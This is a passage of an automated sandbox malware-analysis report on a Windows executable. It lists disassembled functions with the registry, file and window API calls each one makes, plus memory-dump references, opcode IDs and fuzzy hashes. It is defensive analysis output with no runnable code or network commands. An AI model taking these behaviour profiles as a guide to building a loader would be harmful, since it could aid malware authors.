                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3521207402-0
                                                                                                                                            • Opcode ID: 460d54ed7fdcbdaf34342ef30049eeeaa53f78b702f2e670eb354b9bfbb19352
                                                                                                                                            • Instruction ID: 002f7fb6c641edc4c9e1c43034261a5554d3377b2f1f1ae98a311fa9132adf51
                                                                                                                                            • Opcode Fuzzy Hash: 460d54ed7fdcbdaf34342ef30049eeeaa53f78b702f2e670eb354b9bfbb19352
                                                                                                                                            • Instruction Fuzzy Hash: 21016D71904114FBCF20AFA1DD859AE7B71EB40344F14847BFA01B51E0C37C5A81DBAA
                                                                                                                                            Function 00405AA4 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405CE9,00000000,00000002,?,00000002,?,?,00405CE9,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405ACD
                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CE9,?,00405CE9), ref: 00405AEE
                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00405B0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                            • Instruction ID: bd87ec550333214892aadd2865629ce231d6a2c68cbcf8666acf0199ad1a476e
                                                                                                                                            • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                            • Instruction Fuzzy Hash: 6A01487114020AEFDB22CF64ED44AEB3FACEF14354F004026F905A6260D235E964CBA5
                                                                                                                                            Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                                                                                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,noncontamination\lftebevgelse\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Enum$CloseOpenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167947723-0
                                                                                                                                            • Opcode ID: c3898ecfa7699d7de0da3c96e56fdfea5a8e72b292a63302a9467dbfd1221bd5
                                                                                                                                            • Instruction ID: ea0f8bb5b2539548621220bc90554a9af61e98564e095efd323173a2c2703bf4
                                                                                                                                            • Opcode Fuzzy Hash: c3898ecfa7699d7de0da3c96e56fdfea5a8e72b292a63302a9467dbfd1221bd5
                                                                                                                                            • Instruction Fuzzy Hash: 57F081B2A04204FFE7119F659E8CEBF7A6CEB40748F10853EF441B62C0D6B95E41966A
                                                                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                                                                                                            • Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
                                                                                                                                            • Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                                                                                                            • Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D
                                                                                                                                            Function 00404F78 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00404F88
                                                                                                                                              • Part of subcall function 00403EBF: SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 00403ED1
                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 00404FD4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2896919175-0
                                                                                                                                            • Opcode ID: 95ed032086cd7b7ec3909f283eb43c8662eae8242282bbae4cb2665158c72c3f
                                                                                                                                            • Instruction ID: 554e4b24135bb6da8e7d05b9f53d795516d0805debc7cba95de8ce4b0c419bda
                                                                                                                                            • Opcode Fuzzy Hash: 95ed032086cd7b7ec3909f283eb43c8662eae8242282bbae4cb2665158c72c3f
                                                                                                                                            • Instruction Fuzzy Hash: AEF024F2A042029AD7212F449D01B1677B4EBD0306F05857AFF08732E0C33D5902866D
                                                                                                                                            Function 0040584E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00405852
                                                                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405874
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                            • Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                                                                                            • Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
                                                                                                                                            • Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                                                                                            • Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16
                                                                                                                                            Function 00405829 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00405441,?,?,00000000,00405624,?,?,?,?), ref: 0040582E
                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405842
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                                                                                            • Instruction ID: 288d8d8f9d8fe744cb80d7443cee80a3ea5bd4e337ee5555e0f2e4cd48392136
                                                                                                                                            • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                                                                                            • Instruction Fuzzy Hash: 2AD0C972908120ABC2102728AD0889BBB55EB542717018B31FC65A22B0C7304C62CAA5
                                                                                                                                            Function 0040223B Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                            • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                                                                                                            • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                                                                                                                            • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                                                                                                            • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                                                                                                                            Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                                                                                                            • Instruction ID: 692d63f4e87c936e9446e8fa18252424463a9f70da0c26dc4546bcf220c6e71a
                                                                                                                                            • Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                                                                                                            • Instruction Fuzzy Hash: D7E08CB6250108BFDB40EFA4EE4BFA637ECFB14704F00C121BA08E7091CA78E5109B68
                                                                                                                                            Function 004058C6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403068,00000000,00000000,00402EAE,000000FF,00000004,00000000,00000000,00000000), ref: 004058DA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                            • Instruction ID: 18ab15d3875c8aca8147d786b71a19f163cd1be083ac94134eb356fb97c53e98
                                                                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                            • Instruction Fuzzy Hash: 9FE0EC3361425AEFDF10AE659C04AEB7B6CEF05360F008433FD15E2150D231E921EBA9
                                                                                                                                            Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: bad0cb919f859e81d349d5dba00592a48f68b19ab23d0192a814859a48de207d
                                                                                                                                            • Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
                                                                                                                                            • Opcode Fuzzy Hash: bad0cb919f859e81d349d5dba00592a48f68b19ab23d0192a814859a48de207d
                                                                                                                                            • Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29
                                                                                                                                            Function 00403EBF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 00403ED1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                                                                                                            • Instruction ID: b3c8485646d9c058ec71e9ab696a48b88cadb806b99eba66945500c977f65eb2
                                                                                                                                            • Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                                                                                                            • Instruction Fuzzy Hash: 1EC04C717442007AEA218F509D49F1777586750701F5544257254A51D0C6B4E410D66D
                                                                                                                                            Function 0040306B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF0,?), ref: 00403079
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                            Function 00403EA8 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403CD9), ref: 00403EB6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
